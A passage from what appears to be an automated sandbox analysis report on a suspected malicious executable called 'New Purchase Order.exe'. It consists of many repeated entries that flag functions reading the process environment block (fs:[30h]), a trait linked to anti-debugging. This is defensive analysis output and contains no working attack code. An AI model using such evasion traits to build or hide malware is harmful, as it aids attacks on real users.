                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_016F6154 mov eax, dword ptr fs:[00000030h] 8_2_016F6154
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_01784144 mov eax, dword ptr fs:[00000030h] 8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_01784144 mov ecx, dword ptr fs:[00000030h] 8_2_01784144
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_01720124 mov eax, dword ptr fs:[00000030h] 8_2_01720124
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0179A118 mov ecx, dword ptr fs:[00000030h] 8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0179A118 mov eax, dword ptr fs:[00000030h] 8_2_0179A118
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_017B0115 mov eax, dword ptr fs:[00000030h] 8_2_017B0115
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h] 8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov eax, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E10E mov ecx, dword ptr fs:[00000030h]8_2_0179E10E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017201F8 mov eax, dword ptr fs:[00000030h]8_2_017201F8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C61E5 mov eax, dword ptr fs:[00000030h]8_2_017C61E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176E1D0 mov eax, dword ptr fs:[00000030h]8_2_0176E1D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B61C3 mov eax, dword ptr fs:[00000030h]8_2_017B61C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177019F mov eax, dword ptr fs:[00000030h]8_2_0177019F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC188 mov eax, dword ptr fs:[00000030h]8_2_017AC188
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01730185 mov eax, dword ptr fs:[00000030h]8_2_01730185
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA197 mov eax, dword ptr fs:[00000030h]8_2_016EA197
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01794180 mov eax, dword ptr fs:[00000030h]8_2_01794180
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171C073 mov eax, dword ptr fs:[00000030h]8_2_0171C073
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776050 mov eax, dword ptr fs:[00000030h]8_2_01776050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F2050 mov eax, dword ptr fs:[00000030h]8_2_016F2050
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786030 mov eax, dword ptr fs:[00000030h]8_2_01786030
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA020 mov eax, dword ptr fs:[00000030h]8_2_016EA020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC020 mov eax, dword ptr fs:[00000030h]8_2_016EC020
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E016 mov eax, dword ptr fs:[00000030h]8_2_0170E016
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01774000 mov ecx, dword ptr fs:[00000030h]8_2_01774000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01792000 mov eax, dword ptr fs:[00000030h]8_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017320F0 mov ecx, dword ptr fs:[00000030h]8_2_017320F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F80E9 mov eax, dword ptr fs:[00000030h]8_2_016F80E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]8_2_016EA0E3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017760E0 mov eax, dword ptr fs:[00000030h]8_2_017760E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC0F0 mov eax, dword ptr fs:[00000030h]8_2_016EC0F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017720DE mov eax, dword ptr fs:[00000030h]8_2_017720DE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B60B8 mov eax, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B60B8 mov ecx, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E80A0 mov eax, dword ptr fs:[00000030h]8_2_016E80A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017880A8 mov eax, dword ptr fs:[00000030h]8_2_017880A8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F208A mov eax, dword ptr fs:[00000030h]8_2_016F208A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179437C mov eax, dword ptr fs:[00000030h]8_2_0179437C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BA352 mov eax, dword ptr fs:[00000030h]8_2_017BA352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01798350 mov ecx, dword ptr fs:[00000030h]8_2_01798350
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov ecx, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C634F mov eax, dword ptr fs:[00000030h]8_2_017C634F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov ecx, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01710310 mov ecx, dword ptr fs:[00000030h]8_2_01710310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC310 mov ecx, dword ptr fs:[00000030h]8_2_016EC310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017263FF mov eax, dword ptr fs:[00000030h]8_2_017263FF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov ecx, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC3CD mov eax, dword ptr fs:[00000030h]8_2_017AC3CD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017763C0 mov eax, dword ptr fs:[00000030h]8_2_017763C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E826B mov eax, dword ptr fs:[00000030h]8_2_016E826B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C625D mov eax, dword ptr fs:[00000030h]8_2_017C625D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01778243 mov eax, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01778243 mov ecx, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6259 mov eax, dword ptr fs:[00000030h]8_2_016F6259
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA250 mov eax, dword ptr fs:[00000030h]8_2_016EA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E823B mov eax, dword ptr fs:[00000030h]8_2_016E823B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C62D6 mov eax, dword ptr fs:[00000030h]8_2_017C62D6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov ecx, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786500 mov eax, dword ptr fs:[00000030h]8_2_01786500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179EA60 mov eax, dword ptr fs:[00000030h]8_2_0179EA60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]8_2_0172CA6F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]8_2_01700A5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
